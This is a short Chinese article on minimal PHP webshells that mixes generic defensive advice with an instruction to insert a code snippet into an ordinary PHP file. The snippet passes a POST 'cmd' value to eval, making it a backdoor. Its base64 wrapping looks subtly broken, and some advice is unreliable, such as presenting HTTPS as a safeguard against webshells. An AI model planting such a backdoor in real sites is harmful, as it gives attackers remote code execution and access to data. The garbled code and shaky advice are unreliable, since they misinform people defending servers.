PHP网页木马是一种嵌入PHP网页中的恶意代码,可以通过网页访问控制页面、篡改网页内容或者窃取用户的敏感信息等。常见的PHP网页木马包括WebShell、PHPspy、PHPshkit等。
最小的PHP网页木马所使用的原理是将恶意代码压缩到最小的尺寸并插入网页的通用标签内,如:JPG图片标签、CSS标签、Alt标签等。这种方式可以避免被常规的安全扫描器检测到。
安装反病毒软件并保证其定期更新可以有效预防和清除php木马。
使用强密码对MySQL、FTP等工具进行登录,可以有效避免被恶意攻击利用密码猜测工具猜测访问。
定期检查网站文件可以有效避免恶意代码的植入。建议养成每日检查更新程序的习惯。
网站应该禁止一切非管理员上传文件,特包括PHP文件、jsp文件、aspx等语言文件。
使用HTTPS协议加密传输,可以有效保证网站的安全。
在一个正常的php文件中插入以下代码:
<?php
$ddd=base64_decode('Lyo=').$_POST['cmd'].base64_decode('IC8q');
eval("?>".base64_decode($ddd));
?>
这段代码的功能是接收从POST请求中得到的命令,并执行该命令,从而达到窃取网站敏感信息的目的。
安装杀毒软件或者使用在线杀毒网站进行检测,定时检查网站文件,以及有效保证管理员账号的安全(包括登录口令)等,这样可以大大降低php木马带来的危害。
最小的PHP网页木马是一种难以检测的恶意代码,但是通过一定的防范措施,包括安装反病毒软件、禁止上传非管理员文件以及使用HTTPS加密传输等,可以有效遏制其侵害。